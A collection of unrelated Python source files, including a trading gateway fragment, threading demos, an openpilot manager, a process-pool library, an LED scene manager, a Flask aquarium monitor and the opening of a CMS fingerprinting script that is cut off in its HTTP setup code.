if changed:
self.write_log(f'委托单更新=>{order.__dict__}')
self.order_manager.on_order(copy(order))
def process_deal(self, data):
"""
Process trade data for both query and update.
"""
for ix, row in data.iterrows():
# 系统委托编号
tradeid = str(row["deal_id"])
if tradeid in self.trades:
continue
self.trades.add(tradeid)
symbol, exchange = convert_symbol_futu2vt(row["code"])
# 系统委托号
sys_orderid = row["order_id"]
# 本地委托号
local_orderid = self.order_manager.get_local_orderid(sys_orderid)
trade = TradeData(
symbol=symbol,
exchange=exchange,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
tradeid=tradeid,
orderid=local_orderid,
sys_orderid=sys_orderid,
price=float(row["price"]),
volume=row["qty"],
time=row["create_time"].split(" ")[-1],
gateway_name=self.gateway_name,
)
self.on_trade(trade)
def convert_symbol_futu2vt(code):
"""
Convert symbol from futu to vt.
"""
code_list = code.split(".")
futu_exchange = code_list[0]
futu_symbol = ".".join(code_list[1:])
exchange = EXCHANGE_FUTU2VT[futu_exchange]
return futu_symbol, exchange
def convert_symbol_vt2futu(symbol, exchange):
"""
Convert symbol from vt to futu.
"""
futu_exchange = EXCHANGE_VT2FUTU[exchange]
return f"{futu_exchange}.{symbol}"
|
f1.py
|
from threading import Thread
import threading
from time import sleep
def fib_calc(begin, end):
""" Calculae fib """
a, b = 0, begin
while b < end:
print(b)
a, b = b, a + b
class CookBook(Thread):
def __init__(self):
Thread.__init__(self)
self.message = "This is my thread"
def print_message(self):
print(self.message)
def run(self):
print("Threadind start\n")
x = 0
while x < 10:
self.print_message()
sleep(1)
x += 2
print("Thread end\n")
def function_i(i):
name = threading.current_thread().getName()
print(f" {name} function {i}")
return
if __name__ == '__main__':
threads = []
for i in range(10):
t = threading.Thread(target=function_i, args=(i,))
threads.append(t)
t.start()
t.join()
|
microscope.py
|
import logging
import os
import threading
import aiohttp_cors
from aiohttp import web
from controllers.controller import routes, IController
from bootstrapper import Bootstapper
from services.ws import WebSocketManager
from workers.workers import IWorker
ROOT = os.path.dirname(__file__)
container=Bootstapper().bootstrap()
if __name__ == "__main__":
os.makedirs(f'/deepmicroscopy', exist_ok=True)
logging.basicConfig(level=logging.INFO)
app = web.Application()
cors = aiohttp_cors.setup(app)
workers = container.resolve_all(IWorker)
for worker in workers:
threading.Thread(target=worker.work).start()
controllers = container.resolve_all(IController)
for controller in controllers:
routes.add_class_routes(controller)
app.add_routes([web.get('/ws', WebSocketManager.websocket_handler)])
app.add_routes(routes)
web.run_app(app, port=8080)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \
terms_version, training_version, comma_remote, \
get_git_branch, get_git_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# HKG
("UseClusterSpeed", "0"),
("LongControlEnabled", "0"),
("MadModeEnabled", "0"),
("IsLdwsCar", "0"),
("LaneChangeEnabled", "1"),
("AutoLaneChangeEnabled", "1"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("ShowDebugUI", "0"),
("UseSMDPSHarness", "0"),
("SSCOD", "0"),
("DisableUpdates", "0"),
("LoggerEnabled", "0"),
("CleanUI", "1"),
("AR", "0"),
("UseLQR", "0"),
("PutPrebuilt", "0"),
("TPMS_Alerts", "1"),
("PutPrebuilt", "0"),
("StockNaviDecelEnabled", "0"),
("ShowDebugUI", "0"),
("CustomLeadMark", "0"),
("HyundaiNaviSL", "0"),
("DisableOpFcw", "0"),
("NewRadarInterface", "0"),
("LowSpeedAlerts", "1"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", version)
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_git_commit(default=""))
params.put("GitBranch", get_git_branch(default=""))
params.put("GitRemote", get_git_remote(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
for p in managed_processes.values():
p.stop()
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc]
cloudlog.debug(' '.join(running_list))
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# TODO: let UI handle this
# Exit main loop when uninstall is needed
if params.get_bool("DoUninstall"):
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
if Params().get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
fastprocesspool_debug.py
|
# Copyright 2018 Martin Bammer. All Rights Reserved.
# Licensed under MIT license.
"""Implements a lightweight as fast process pool."""
__author__ = 'Martin Bammer (mrbm74@gmail.com)'
import sys
import atexit
import time
import inspect
import threading
import itertools
from collections import deque
from multiprocessing import Process, Pipe
if sys.version_info[0] > 2:
import _thread
from os import cpu_count
else:
import thread as _thread
from multiprocessing import cpu_count
# Create own semaphore class which is much faster than the original version in the
# threading module.
class Semaphore(object):
def __init__(self):
self._value = 0
self._value_lock = _thread.allocate_lock()
self._zero_lock = _thread.allocate_lock()
self._zero_lock.acquire()
def acquire(self):
if self._value < 1:
self._zero_lock.acquire()
with self._value_lock:
self._value -= 1
def release(self):
if self._zero_lock.locked():
try:
self._zero_lock.release()
except:
pass
with self._value_lock:
self._value += 1
_shutdown = False
_job_cnt = Semaphore()
_childs = set()
LOGGER_NAME = 'fastprocesspool'
DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s'
def _python_exit():
global _shutdown
print("_python_exit")
_shutdown = True
_job_cnt.release()
for thread in _childs:
thread.join()
atexit.register(_python_exit)
class Redirect2Pipe(object):
def __init__(self, stream):
self.stream = stream
def write(self, buf):
self.stream.send(buf)
def _child(stdout, stderr, jobs, errors, name):
sys.stdout = Redirect2Pipe(stdout)
sys.stderr = Redirect2Pipe(stderr)
print(name, "child STARTED")
jobs_recv = jobs.recv
jobs_send = jobs.send
errors_send = errors.send
inspect_isgeneratorfunction = inspect.isgeneratorfunction
while True:
try:
job = jobs_recv()
#print(name, "child JOB", job)
except Exception as exc:
print("child EXC", exc)
errors_send(exc)
break
if job is None:
break
try:
fn, done_callback, args, kwargs = job
if inspect.isgeneratorfunction(fn):
for result in fn(*args, **kwargs):
jobs_send(( done_callback, result ))
else:
jobs_send(( done_callback, fn(*args, **kwargs) ))
except Exception as exc:
print("EXC", exc)
errors_send(exc)
print(name, "child EXIT")
def _child_results_thread(have_results, results, jobs):
jobs_send = jobs.send
while True:
have_results.acquire()
results_chunk = []
exit_thread = False
try:
while True:
result = results.popleft()
if result is None:
exit_thread = True
break
results_chunk.append(result)
except:
pass
#print(results_chunk)
if results_chunk:
jobs_send(results_chunk)
if exit_thread:
break
def _child_chunks(stdout, stderr, child_id, jobs, errors, max_chunk_size, itr):
sys.stdout = Redirect2Pipe(stdout)
sys.stderr = Redirect2Pipe(stderr)
print(child_id, "child_CHUNKS STARTED")
errors_send = errors.send
results = deque()
have_results = _thread.allocate_lock()
have_results.acquire()
thr_res = threading.Thread(target = _child_results_thread, args = ( have_results, results, jobs ),
name = child_id + "child_results")
thr_res.daemon = True
thr_res.start()
inspect_isgeneratorfunction = inspect.isgeneratorfunction
if itr is None:
jobs_recv = jobs.recv
while True:
try:
jobs = jobs_recv()
except Exception as exc:
errors_send(exc)
break
if jobs is None:
break
for job in jobs:
try:
fn, done_callback, args, kwargs = job
if inspect_isgeneratorfunction(fn):
for result in fn(*args, **kwargs):
results.append(( done_callback, result ))
else:
results.append(( done_callback, fn(*args, **kwargs) ))
if (len(results) >= max_chunk_size) and have_results.locked():
have_results.release()
except Exception as exc:
errors_send(exc)
else:
for job in itr:
try:
fn, args = job
results.append(fn(args))
if (len(results) >= max_chunk_size) and have_results.locked():
have_results.release()
except Exception as exc:
errors_send(exc)
results.append(None)
if have_results.locked():
have_results.release()
thr_res.join()
class Pool(object):
def __init__(self, max_childs = None, child_name_prefix = "", done_callback = None,
failed_callback = None, log_level = None, max_chunk_size = 1):
global _shutdown, _job_cnt
_shutdown = False
_job_cnt = Semaphore()
print("\nNEW POOL", _childs)
self.max_childs = None
if max_childs is None:
self.max_childs = cpu_count()
elif max_childs > 0:
self.max_childs = max_childs
else:
self.max_childs = cpu_count() + max_childs
if self.max_childs <= 0:
raise ValueError("Number of child threads must be greater than 0")
self.child_name_prefix = child_name_prefix + "-" if child_name_prefix else "ProcessPool%s-" % id(self)
self._max_chunk_size = max_chunk_size
self._child_cnt = 0
self.jobs = deque()
self.done = deque()
self.failed = deque()
self._done_cnt = Semaphore()
self._failed_cnt = Semaphore()
self.logger = None
if done_callback:
self._thr_done = threading.Thread(target = self._done_thread, args = ( done_callback, ),
name = "ProcessPoolDone")
self._thr_done.daemon = True
self._thr_done.start()
if failed_callback or log_level:
if log_level:
import logging
self.logger = logging.getLogger(LOGGER_NAME)
self.logger.propagate = False
formatter = logging.Formatter(DEFAULT_LOGGING_FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if log_level:
self.logger.setLevel(log_level)
self._thr_failed = threading.Thread(target = self._failed_thread, args = ( failed_callback, ),
name = "ProcessPoolFailed")
self._thr_failed.daemon = True
self._thr_failed.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
def _stdout_thread(self, stdout):
stdout_recv = stdout.recv
while not _shutdown:
text = stdout_recv()
if text is None:
break
if self.logger is None:
print(text)
else:
self.logger.info(text)
def _stderr_thread(self, stderr):
stderr_recv = stderr.recv
while not _shutdown:
text = stderr_recv()
if text is None:
break
if self.logger is None:
print(text, file = sys.stderr)
else:
self.logger.error(text)
def _done_thread(self, done_callback):
done_popleft = self.done.popleft
_done_cnt_acquire = self._done_cnt.acquire
while not _shutdown:
try:
result = done_popleft()
#print("_done_thread RESULT")
except Exception as exc:
print("_done_thread", exc)
if _shutdown:
break
_done_cnt_acquire()
else:
done_callback(result)
def _failed_thread(self, failed_callback):
failed_popleft = self.failed.popleft
_failed_cnt_acquire = self._failed_cnt.acquire
while not _shutdown:
try:
result = failed_popleft()
print("_failed_thread", result)
except Exception as exc:
print("_failed_thread", exc)
if _shutdown:
break
_failed_cnt_acquire()
else:
failed_callback(result)
def _sender_thread_loop(self, job_conn):
_job_cnt_acquire = _job_cnt.acquire
failed_append = self.failed.append
jobs_popleft = self.jobs.popleft
job_conn_send = job_conn.send
print(threading.current_thread().name, "_sender_thread STARTED")
while True:
try:
job = jobs_popleft()
#print(threading.current_thread().name, "_sender_thread", job)
except:
if _shutdown:
_job_cnt.release()
break
# Locking is expensive. So only use it when needed.
_job_cnt_acquire()
continue
if job is None or _shutdown:
print("_sender_thread shutdown", _shutdown)
_job_cnt.release()
break
try:
job_conn_send(job)
except Exception as exc:
failed_append(exc)
def _sender_thread_loop_chunks(self, job_conn):
_job_cnt_acquire = _job_cnt.acquire
failed_append = self.failed.append
jobs_popleft = self.jobs.popleft
job_conn_send = job_conn.send
running = True
while running:
jobs = []
for _ in range(self._max_chunk_size):
try:
job = jobs_popleft()
if job is None:
running = False
break
jobs.append(job)
except:
break
if _shutdown:
_job_cnt.release()
break
if not jobs and running:
# Locking is expensive. So only use it when needed.
_job_cnt_acquire()
continue
try:
job_conn_send(jobs)
except Exception as exc:
failed_append(exc)
def _sender_thread(self, job_conn, rem_job_conn, rem_exc_conn, rem_stdout, rem_stderr,
thr_stdout, thr_stderr, thr_rcv, thr_exc, child, itr):
print(threading.current_thread().name, "_sender_thread SHUTDOWN WAIT")
print(threading.current_thread().name, "child ALIVE JOINING", child.is_alive())
if itr is None:
if self._max_chunk_size > 1 :
self._sender_thread_loop_chunks(job_conn)
else:
self._sender_thread_loop(job_conn)
job_conn.send(None)
child.join()
else:
while not _shutdown and child.is_alive():
child.join(0.1)
print(threading.current_thread().name, "_sender_thread child JOINED")
rem_job_conn.send(None)
self._join_thread(thr_rcv, 0.0, None)
rem_exc_conn.send(None)
self._join_thread(thr_exc, 0.0, None)
print(threading.current_thread().name, "_sender_thread thr_rcv thr_exc JOINED")
if thr_stdout.is_alive():
rem_stdout.send(None)
thr_stdout.join()
if thr_stderr.is_alive():
rem_stderr.send(None)
thr_stderr.join()
print(threading.current_thread().name, "_sender_thread EXIT")
def _receiver_thread(self, job_conn, done_append):
_done_cnt = self._done_cnt
_done_cnt_release = _done_cnt.release
done_append = self.done.append if done_append else False
done_extend = self.done.extend
job_conn_recv = job_conn.recv
print(threading.current_thread().name, "_receiver_thread STARTED")
while True:
results = job_conn_recv()
if results is None or _shutdown:
print(threading.current_thread().name, "_receiver_thread SHUTDOWN", _shutdown)
break
print(threading.current_thread().name, "_receiver_thread %d RESULTS" % len(results))
if done_append is False:
continue
if isinstance(results, tuple):
done_callback, value = results
if done_callback is True:
done_append(value)
if _done_cnt._value < 1:
_done_cnt_release()
elif callable(done_callback):
done_callback(value)
else:
for result in results:
done_callback, value = result
if done_callback is True:
done_append(value)
if _done_cnt._value < 1:
_done_cnt_release()
elif callable(done_callback):
done_callback(value)
print(threading.current_thread().name, "_receiver_thread EXIT")
def _fast_receiver_thread(self, job_conn, done_append):
_done_cnt = self._done_cnt
_done_cnt_release = _done_cnt.release
done_append = self.done.append if done_append else False
done_extend = self.done.extend
job_conn_recv = job_conn.recv
while True:
results = job_conn_recv()
if results is None or _shutdown:
break
if done_append is False:
continue
done_extend(results)
if _done_cnt._value < 1:
_done_cnt_release()
def _exception_thread(self, exc_conn):
_failed_cnt = self._failed_cnt
_failed_cnt_release = _failed_cnt.release
failed_append = self.failed.append
exc_conn_recv = exc_conn.recv
print(threading.current_thread().name, "_exception_thread STARTED")
while True:
exc = exc_conn_recv()
print("_exception_thread", exc)
if exc is None or _shutdown:
print(threading.current_thread().name, "_exception_thread SHUTDOWN", _shutdown)
break
failed_append(exc)
if _failed_cnt._value < 1:
_failed_cnt_release()
print(threading.current_thread().name, "_exception_thread EXIT")
def _start_child(self, itr, done_append):
self._child_cnt += 1
print("_start_child STARTING", self._child_cnt, self._max_chunk_size)
child_id = self.child_name_prefix + str(self._child_cnt)
loc_job_conn, rem_job_conn = Pipe()
loc_exc_conn, rem_exc_conn = Pipe()
loc_stdout, rem_stdout = Pipe(False)
loc_stderr, rem_stderr = Pipe(False)
if (self._max_chunk_size > 1) or not itr is None:
child = Process(target = _child_chunks,
args = ( rem_stdout, rem_stderr, child_id, rem_job_conn, rem_exc_conn,
self._max_chunk_size, itr ),
name = child_id + "child_chunks")
else:
child = Process(target = _child,
args = ( rem_stdout, rem_stderr, rem_job_conn, rem_exc_conn, child_id ),
name = child_id + "child")
child.daemon = True
print(child_id, "child ALIVE", child.is_alive())
child.start()
print(child_id, "child ALIVE", child.is_alive())
thr_stdout = threading.Thread(target = self._stdout_thread, args = ( loc_stdout, ),
name = child_id + "stdout")
thr_stdout.daemon = True
thr_stdout.start()
thr_stderr = threading.Thread(target = self._stderr_thread, args = ( loc_stderr, ),
name = child_id + "stderr")
thr_stderr.daemon = True
thr_stderr.start()
thr_rcv = threading.Thread(target = self._receiver_thread if itr is None else self._fast_receiver_thread,
args = ( loc_job_conn, done_append ),
name = child_id + "rcv")
thr_rcv.daemon = True
thr_rcv.start()
thr_exc = threading.Thread(target = self._exception_thread, args = ( loc_exc_conn, ),
name = child_id + "exc")
thr_exc.daemon = True
thr_exc.start()
thr_snd = threading.Thread(target = self._sender_thread,
args = ( loc_job_conn, rem_job_conn, rem_exc_conn, rem_stdout, rem_stderr,
thr_stdout, thr_stderr, thr_rcv, thr_exc, child, itr ),
name = child_id + "snd")
thr_snd.daemon = True
thr_snd.start()
_childs.add(thr_snd)
print("_start_child STARTED", self._child_cnt)
def _submit(self, fn, done_callback, args, kwargs):
if _shutdown:
raise ValueError("Pool not running")
#print("_submit", args, kwargs)
if (self._child_cnt == 0) or ((self._child_cnt < self.max_childs) and self.jobs):
self._start_child(None, True)
self.jobs.append(( fn, done_callback, args, kwargs ))
if _job_cnt._value < 1:
# Locking is expensive. So only use it when needed.
_job_cnt.release()
def submit(self, fn, *args, **kwargs):
self._submit(fn, True, args, kwargs)
def submit_done(self, fn, done_callback, *args, **kwargs):
self._submit(fn, done_callback, args, kwargs)
def map(self, fn, itr, done_append = True, shutdown_timeout = None):
# done can be False, True or function
if _shutdown:
raise ValueError("Pool not running")
itr = [ ( fn, it ) for it in itr ]
chunksize, extra = divmod(len(itr), self.max_childs)
if extra:
chunksize += 1
if self._max_chunk_size < 1:
self._max_chunk_size = chunksize
it = iter(itr)
for i in range(min(len(itr), self.max_childs)):
self._start_child(list(itertools.islice(it, chunksize)), done_append)
if not shutdown_timeout is None:
self.shutdown(shutdown_timeout)
def _join_thread(self, thread, t, timeout):
print("_join_thread", thread)
global _shutdown
dt = 0.1 if timeout is None else t - time.time()
while True:
try:
thread.join(dt)
if not thread.is_alive():
return True
if not timeout is None:
raise TimeoutError("Failed to join thread %s" % thread.name)
except KeyboardInterrupt:
_shutdown = True
raise
except:
pass
def shutdown(self, timeout = None):
global _shutdown
print("shutdown", timeout)
for _ in range(self.max_childs):
self.jobs.append(None)
_job_cnt.release()
t = None if timeout is None else time.time() + timeout
print("SHUTDOWN#1", len(_childs))
for nr, thr_snd in enumerate(_childs):
print("SHUTDOWN", nr)
self._join_thread(thr_snd, t, timeout)
print("SHUTDOWN#2")
_childs.clear()
if hasattr(self, "_thr_done"):
_shutdown = True
self._done_cnt.release()
self._join_thread(self._thr_done, t, timeout)
if hasattr(self, "_thr_failed"):
_shutdown = True
self._failed_cnt.release()
self._join_thread(self._thr_failed, t, timeout)
def cancel(self):
global _shutdown
_shutdown = True
for _ in range(self.max_childs):
self.jobs.appendleft(None)
_job_cnt.release()
|
scene_manager.py
|
from multiprocessing import Process, Queue, Lock
from Queue import Empty
import time
import opc
import sys
import numpy as np
import utilities.process_descriptor as pd
from utilities.sleep_timer import SleepTimer
import logging
import utilities.logging_server
import argparse
from utilities import logging_handler_setup
from core.devices.fft_device import FftDevice
from core.devices import construct_output_devices, construct_input_devices, combine_channel_dicts
from core.devices.app_device import AppDevice
class SceneManager(object):
"""
Scene Manager is responsible for running a scene
Runs a set of devices (currently only output devices), combines pixel data and forwards onto server
TODO: Handling for input devices
"""
def __init__(self,
input_devices,
output_devices,
scene_fps=60,
device_fps=30,
opc_host="127.0.0.1",
opc_port=7890,
r_scaling = 0.5,
g_scaling = 0.5,
b_scaling = 0.5
):
"""
Initialisation connects to the opc server
Note: This does not run device processes, that's the job of the start command
"""
# Connect to opc client
opc_ip = opc_host + ":" + str(opc_port)
self.client = opc.Client(opc_ip)
if not self.client.can_connect():
raise Exception("Could not connect to opc at " + opc_ip)
# Set fps for scene and device
self.scene_fps = scene_fps
self.device_fps = device_fps
self.input_devices = input_devices
self.output_devices = output_devices
self.scaling = np.array([r_scaling, g_scaling, b_scaling])
# A list of dictionaries which are the device's pixel colors by channel
# Serves as a reference of all the scene pixel colors that get sent to opc in the loop
self.output_device_pixel_dictionary_list = [device.pixel_colors_by_channel_255 for device in self.output_devices]
self.logger = logging_handler_setup("SceneManager")
def start(self):
"""
Runs the scene forever.
devices is a list of device objects
"""
# Initialise
self.start_input_devices()
self.start_output_devices()
# Main loop
sleep_timer = SleepTimer(1.0/self.scene_fps)
while True:
sleep_timer.start()
self.process_input_devices()
self.process_output_devices()
self.update_opc()
sleep_timer.sleep()
# TODO: kill input/output device processes
def start_output_devices(self):
"""
Start output device processes
"""
for device in self.output_devices:
device.fps = self.device_fps
device.start()
def start_input_devices(self):
"""
Start input device processes
"""
# HACK: Need a more generic way to share queues between devices
# App device must be specified after fft in this way
fft_in_queue = None
for device in self.input_devices:
if type(device) == AppDevice:
device.start(self.output_devices, fft_in_queue)
elif type(device) == FftDevice:
fft_in_queue = device.in_queue
device.start()
else:
# Assume start takes no args by default
device.start()
def process_input_devices(self):
"""
Gets data from input devices and passes them onto output devices
TODO: broadcast to specific devices
"""
for input_device in self.input_devices:
# Get data from the queue until cleared
while True:
item = input_device.get_out_queue()
if item is None:
break
# print item
# Pass onto output devices
for output_device in self.output_devices:
output_device.in_queue.put(item)
def process_output_devices(self):
"""
Retrieve pixels from all output devices
"""
# Update pixel lists if new data has arrived
for i, device in enumerate(self.output_devices):
# Get the device queue mutex
with device.queue_mutex:
pixel_dict = device.get_out_queue()
if pixel_dict:
self.output_device_pixel_dictionary_list[i] = pixel_dict
def update_opc(self):
"""
Sends the latest pixels to opc
"""
# Combine the scene pixels into one concatenated dictionary keyed by channel number
# Multiple devices using the same channel are combined with the same ordering as the devices list
channels_combined = {}
for pixel_dict in self.output_device_pixel_dictionary_list:
for channel, pixels in pixel_dict.items():
if channel in channels_combined:
channels_combined[channel].extend(pixels)
else:
channels_combined[channel] = [p for p in pixels]
# Pass onto OPC client
for channel, pixels in channels_combined.items():
scaled_pixels = np.array(np.array(pixels) * self.scaling).astype(int)
self.client.put_pixels(scaled_pixels, channel=channel)
def run_scene(scene_path):
"""
Runs a scene from a scene path
"""
parsed_scene = pd.read_json(scene_path)
# Form devices
input_devices = construct_input_devices(parsed_scene["InputDevices"])
output_devices = construct_output_devices(parsed_scene["OutputDevices"])
scene = SceneManager(input_devices, output_devices, **parsed_scene["SceneDetails"])
# Yaaay! Scene time
scene.start()
def main(args):
# Parse Args
parser = argparse.ArgumentParser(description="Run a scene for us all to marvel")
parser.add_argument("scene_path", help="Path to scene json file")
parser_args = parser.parse_args(args)
# Start the logging server
logging_process = Process(target=utilities.logging_server.main)
logging_process.daemon = True
logging_process.start()
run_scene(parser_args.scene_path)
if __name__ == '__main__':
main(sys.argv[1:])
|
program.py
|
#!/usr/bin/env python
config = "/data/config.py"
from config import *
import sys
import sqlite3
import time
import threading
from flask import Flask, Response, redirect, request, url_for
import signal
import subprocess
global conn
try:
conn = sqlite3.connect(db_location, check_same_thread=False)
print "CONNECTED TO DATABASE"
except:
print "FAILED TO CONNECT TO DATABASE!!!!!!!!!!!!!!"
app = Flask(__name__)
global taco1
taco1 = 1
global taco2
taco2 = 1
global taco3
taco3 = 1
global x
global distance
distance = 10
x = 0
y = 0
z = 0
global identity
global ph
global temp
global sump
identiy = 1
ph = "NOT REGISTERED YET"
temp = "NOT REGISTERED YET"
sump = "NOT REGISTERED YET"
def getinfo():
global identity
global ph
global temp
global sump
while x < 100:
try:
cursor = conn.execute("SELECT id, ph, temp, sump from tank")
for row in cursor:
identity = row[0]
ph = row[1]
temp = row[2]
sump = row[3]
time.sleep(1)
except KeyboardInterrupt:
print "CLOSING getinfo"
conn.close()
sys.exit()
def signal_handler(signal, frame):
print 'You pressed Ctrl+C!'
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def events():
global identity
global ph
global temp
global sump
while x < 100:
try:
now = "data: " + str(ph) + "%" + str(temp) + \
"%" + str(sump) + "\n\n"
time.sleep(1)
yield now
except KeyboardInterrupt:
print "CLOSING events"
conn.close()
sys.exit()
events()
@app.route('/')
def index():
if request.headers.get('accept') == 'text/event-stream':
return Response(events(), content_type='text/event-stream')
return redirect(url_for('static', filename='index.html'))
if __name__ == "__main__":
a = threading.Thread(target=getinfo)
a.daemon = True
a.start()
app.run(host='0.0.0.0', port=3000, debug=True,
use_reloader=False, threaded=True)
conn.close()
|
cmsfinger.py
|
# -*- coding:utf-8 -*-
import os, sys
import threading
import time
import re
import ctypes
import urllib.request, urllib.parse, urllib.error
import socket
import urllib.request, urllib.error, urllib.parse
import http.cookiejar
import zlib
import struct
import ctypes
import io
class Log():
FILE = ''
LOGLOCK = None
std_out_handle = None
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
GRAY = 0x08
GREEN = 0x0a
BLUE = 0x0b
RED = 0x0c
PINK = 0x0d
YELLOW = 0x0e
WHITE = 0x0f
@staticmethod
def INIT():
Log.std_out_handle = ctypes.windll.kernel32.GetStdHandle(Log.STD_OUTPUT_HANDLE)
if Log.LOGLOCK == None:
Log.LOGLOCK = threading.RLock()
@staticmethod
def set_cmd_text_color(color):
return ctypes.windll.kernel32.SetConsoleTextAttribute(Log.std_out_handle, color)
@staticmethod
def resetColor():
Log.set_cmd_text_color(Log.WHITE)
@staticmethod
def console(line, color=YELLOW):
line = line + '\n'
Log.LOGLOCK.acquire()
Log.set_cmd_text_color(color)
sys.stdout.write(line)
Log.resetColor()
Log.LOGLOCK.release()
@staticmethod
def file(line, color=GREEN):
Log.console(line, color)
line = line + '\n'
if Log.FILE != '':
Log.LOGLOCK.acquire()
f = open(Log.FILE, 'a')
f.write(line)
f.close()
Log.LOGLOCK.release()
class AHTTPErrorProcessor(urllib.request.HTTPErrorProcessor):
def http_response(self, req, response):
code, msg, hdrs = response.code, response.msg, response.info()
if code == 302: return response # stop 302
if not (200 <= code < 300):
response = self.parent.error('http', req, response, code, msg, hdrs)
return response
https_response = http_response
class HttpSession():
UserAgent = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'
def __init__(self, url='', follow302=True):
self.jar = http.cookiejar.CookieJar()
self.url = url
self.html = ''
self.headers = ''
self.jumpurl = ''
self.follow302 = follow302
self.opener = None
@staticmethod
def make_cookie(name, value, domain):
return http.cookiejar.Cookie(
version=0,
name=name,
value=value,
port=None,
port_specified=False,
domain=domain,
domain_specified=True,
domain_initial_dot=False,
path="/",
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest=None
)
def Get(self, url='', data=None):
if url != '':
self.url = url
if self.url == '':
self.Update('')
return False
if self.opener == None:
if self.follow302:
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.jar))
else:
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.jar),
AHTTPErrorProcessor)
self.opener.addheaders = [
('User-Agent', HttpSession.UserAgent),
